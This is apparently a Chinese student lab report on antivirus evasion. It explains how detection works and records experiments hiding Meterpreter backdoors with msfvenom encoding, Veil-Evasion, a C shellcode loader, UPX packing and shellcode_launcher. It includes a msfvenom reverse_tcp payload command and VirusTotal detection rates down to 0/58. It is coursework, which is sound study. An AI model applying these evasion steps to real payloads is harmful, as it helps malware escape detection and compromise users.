王柏舟p免杀原理与实践twbf

免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”，它指的是一种能使病毒木马免于被杀毒软件查杀的技术。

简单来说一段特征码就是一段或多段数据。如果一个可执行文件（或其他运行的库、脚本等）包含这样的数据则被认为是恶意代码。，这种检测方式的特是：精确检测，但滞后，需要先得到特征码才能检测出恶意软件。

启发式Heuristic，简单来说，就是根据些片面特征去推断，比如软件的行为、软件的签名等。通常是在没有精确判定依据时使用启发式检测。这种检测方式的优点是：可以检测0-day恶意软件，具有一定通用性，缺点是：实时监控系统行为，开销稍多；没有基于特征码的精确度高，可能错判。

从理论上讲，基于行为的检测相当于是启发式的一种，更侧重于监控软件的行为。有一些行为是恶意代码共有的，而且比较特殊，在正常代码中比较罕见。当程序运行时，监视其行为，如果发现了病毒行为，立即报警。这种检测方法可预报未知的多数病毒，但不能发现是哪种病毒。

如果只有EXE，可以加压缩壳或加密壳；如果有shellcode(像Meterpreter），可以使用encode进行编码，或基于payload重新编译生成可执行文件；如果有源代码，可以用其他语言进行重写再编译。

1.后门文件检测

上次实验中生成了meter_backdoor的后门文件。

将文件复制到Windows中，杀毒软件会提示该文件是木马文件，选择将其找回。

检出率为56/71，比没有编码前降低了一点，效果可以忽略。

将文件复制到Windows中，杀毒软件同样会提示该文件是木马文件,选择找回。

在VirusTotal中检测：

检出率为56/71，和一次编码的效果没有差别。可见利用编码次数来达到免杀效果显然是不行的。

1.生成jar文件

检出率为35/61，和exe比起来jar格式文件明显少了很多。

2.生成php文件

检出率为3/58，效果特别好。

Veil用于创建可被Meterpreter调用的Python程序。

这是我选择的第二种方法，期间碰到的一些问题及解决方法在后面详细说明。

2.生成文件

输入 veil 打开软件，输入 use evasion 进入veil-evasion：

进入到菜单界面可以看到当前一共有 41 种 payload 可用。

检出率为48/72。

执行指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.246.137 LPORT=4321 -f c ，得到一段shellcode编码。

touch 新建一个4321_shellcode.c文件，用vim进行编辑，把刚得到的shellcode数组拷贝进去，并增加一个main函数。

检出率为43/72。

本实验利用upx实现加壳，方法是：upx #需加壳的原文件 -o #加壳生成文件

在Windows端运行加壳文件，kali打开msf监控测试：

回连成功。

检出率为38/72。效果非常好。

将文件放到win中指定位置，杀毒软件提示该文件是木马文件,选择找回。

但是可以成功反弹回连。

检出率51/71，免杀效果还不如加壳。

进入到evasion中，用list查看可用的有效荷载：

选择第32个荷载： use 32 （Phython下shellcode在DES下加密的一种）

用 generate 生成，shellcode平台选择2-msfvenom，payloads、IP用Tab自动获取。

输入文件名w4321，选择Py2Exe生成exe文件。

检出率为0/58！

使用shellcode_launcher（一种效果最好的shellcode加载器）实现免杀

1.杀软是如何检测出恶意代码的？

（1）基于特征码检测：如果一个可执行文件（或其他运行的库、脚本等）包含特定的数据则被认为是恶意代码。

（2）启发式恶意软件检测：如果一个软件干的事通常是恶意软件才会干的，就可从中得到启发，把它看做是恶意软件。

（3）基于行为的恶意软件检测：相当于是启发式的一种，或者是加入了行为监控的启发式。通过对病毒多年的观察、研究，有一些行为是恶意代码的共同行为，而且比较特殊。当程序运行时，进行检测，如果发现了病毒行为，立即报警。

2.免杀是做什么？

通过针对杀毒软件查杀恶意代码的原理，将恶意代码进行修改和包装，使得恶意代码能够不被杀毒软件所检测和查杀。

3.免杀的基本方法有哪些？

（1）改变特征码

（2）改变行为

4.开启杀软能绝对防止电脑中恶意代码吗？

开启杀软不能绝对防止电脑中恶意代码，但是及时更新是可以降低中毒的几率的。

1.安装好veil后提示：

2.

我的kali里没有自带的mingw-w64，需要sudo apt-get install mingw-w64来安装。

这次实验中尝试了很多免杀方法，有些无截图就没有写到报告里。每次实验都会遇到大大小小的问题，让人非常崩溃。但是花费足够多的时间和精力后，问题又会顺利解决或者莫名其妙消失。在解决问题的过程中，我学习到了不少实验内容以外的kali linux知识。另外经过实验我了解到杀毒软件并不是特别可靠，我通过一些简单步骤生成的木马病毒无法被识别，需要我们及时更新杀软、及时进行电脑体检，提高安全意识。